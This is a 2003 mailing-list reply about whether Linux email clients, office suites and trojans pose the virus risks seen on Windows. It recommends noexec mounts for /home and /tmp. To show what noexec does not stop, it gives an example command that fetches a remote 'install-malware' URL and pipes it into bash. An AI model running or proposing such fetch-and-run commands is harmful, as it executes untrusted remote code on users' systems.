On Thu, 6 Feb 2003, Tzafrir Cohen wrote:
> > machines is fairly slight. Consider;
> > Most Windows viruses spread by using Lookout Express and other office
> > procut APIs. A great way of reducing your risk of infection on Windows
> > is to use some other email client and office suite.
>
> Or to patch them with the latest security pathces!
That certainly helps, but there are so many....
>
> >
> > MS Office products are not available for Linux.
> >
> > Now, it might be that if everone on Windows used, say, Eudora and
> > SmartSuite then those products would be found to have similar problems.
> >
> > On Linux, there is no predominant email client as there is on Windows.
> > Some use Ximian Evolution, others use Kmail or Mozilla or Balsa. At the
> > moment I'm typing away in Pine, many prefer Mutt.
>
> Is your pine updated? (A reminder: a rather trivial hole in pine <=4.44
I have the official Red Hat update, already installed before you
asked;-)
> was only exposed when pine 4.50 was about to be released, and it turned
> out tha the problem was fixed there. THe author of pine knew of this
> problem much earlier. It is only by pure luck that some black-hats didn't)
>
> Many of the windows worms ("virusus") spread through the use of
> long-patched security holes.
Worms and viruses are different, but you're right, and this applies to
Slammer too.
>
> Another problem is that when you "open" an attachment, you can't know in
> advance if it will be a harmless image, or an executable (that may be a
> worm, even if you are not a privilged user)
>
> The more I look at evolution and kmail, the more they look like outlook's
> interface with this exact design flaw.
Test them.
I tried sending myself a shell script as an attachment to myself, and
tried it with kmail.
It distressed me by trying to run it. but it didn't have the execute
permsissions.
> >
> > I tried running executale content from Kmail (which I use a lot), and
> > failed. If you manage to do it with any Linux email client, file a bug
> > report and use something else.
> >
>
> Interesting: what about koffice documents? do they have any built-in
> macros?
I don't use koffice, and I've not tested OOo which I do use.
>
> I know that many in the gnumeric development community want to make it
> able to run visual basic macros.
>
> Are there any such macrosthat are executed on document open?
Macros that run at any time are a hazard.
>
> > Linux does not run Windows programs, especially if you don't install
> > Wine or Crossover. Therefore, it's not troubled by Windows Wogs.
> >
> > Even if you did get a Linux virus, the damage it would do is limited to
> > the account of the user that received it. Others would be unaffected.
>
> This is true, and very important.
>
> But keep in mind that it only takes a user to spread a worm.
It takes one user to spread a virus. It takes many to feed it.
>
> >
> > Now, trojan horses are another matter. If I can persuade you to run
> > "this nifty little program" then it can do damage to you (even if it
> > does what I said it does), and if I can persuade you to run it as root,
> > then it can do considerable damage.
> >
> > I don't think AV software will help much with that.
>
> Fully agree. Although AV products try to do so on windows ...
They can fix known trojans, but there's no way they can tell that the
program attached to this email (just joking) won't send me your credit
card details.
I guess many businesses here have business secrets it's worth going to a
lot of trouble to acquire. Perhaps worth an expenditure of millions of
dollars.
That is what you have to defend against; not so much viruses and trojans
that mostly do little more than make a pest of themselves.
On Linux, if your users' home directories are in /home, if /tmp and
/var/tmp are separately-mounted filesystems, you can mount them with the
noexec option and so prevent users from running their own programs.
However, It won't prevent these:
. some-nasty
lynx -dump http://www.microsoft.com/install-malware | bash
At least, with Linux, you can vet the code yourselves if you feel the
need. Can't do that with Gatesware.
--
Cheers
John.
Join the "Linux Support by Small Businesses" list at
http://mail.computerdatasafe.com.au/mailman/listinfo/lssb
